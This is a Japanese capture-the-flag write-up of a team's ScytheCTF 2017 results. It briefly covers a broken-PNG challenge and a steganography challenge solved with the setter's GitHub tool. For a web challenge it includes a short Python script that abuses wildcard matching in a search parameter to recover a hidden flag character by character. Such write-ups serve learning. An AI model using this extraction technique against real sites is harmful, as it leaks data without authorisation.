チーム Harekaze で ScytheCTF 2017 に参加しました。最終的にチームで 425 点を獲得し、順位は 7 位 (得点 84 チーム中) でした。うち、私は 2 問を解いて 225 点を入れました。
以下、解いた問題の write-up です。
壊れた PNG ファイル…のハズですが、ペイントで読めてしまいました。
% で検索すると 1338 件が見つかり、CTF{\%} で検索してみると 1 件が見つかりました。1 文字ずつ特定していけばよさそうです。
import requests
import urllib
def check(s):
c = requests.get('http://hack.bckdr.in/BITCOIN/?search=' + urllib.quote(s)).content
if '0 results' in c:
return False
return True
res = 'CTF{'
t = '0123456789abcdefghijklmnopqrstuvwxyz_'
for _ in range(33):
for c in t:
if check(res + c + '%}'):
res += c
break
print res
でフラグが得られました。
与えられた画像を見ると Reorganize profiles on GitHub, LinkedIn ? と読めました。作問者の GitHub アカウントを漁ってみると jaybosamiya/busysteg が見つかりました。
ただ、手元にこれをビルドできる環境がなく、環境を作るのに時間がかかりそうだったのでチームの Slack に投げたところ、まりこうじさん (@neglect_yp) にやってもらえました。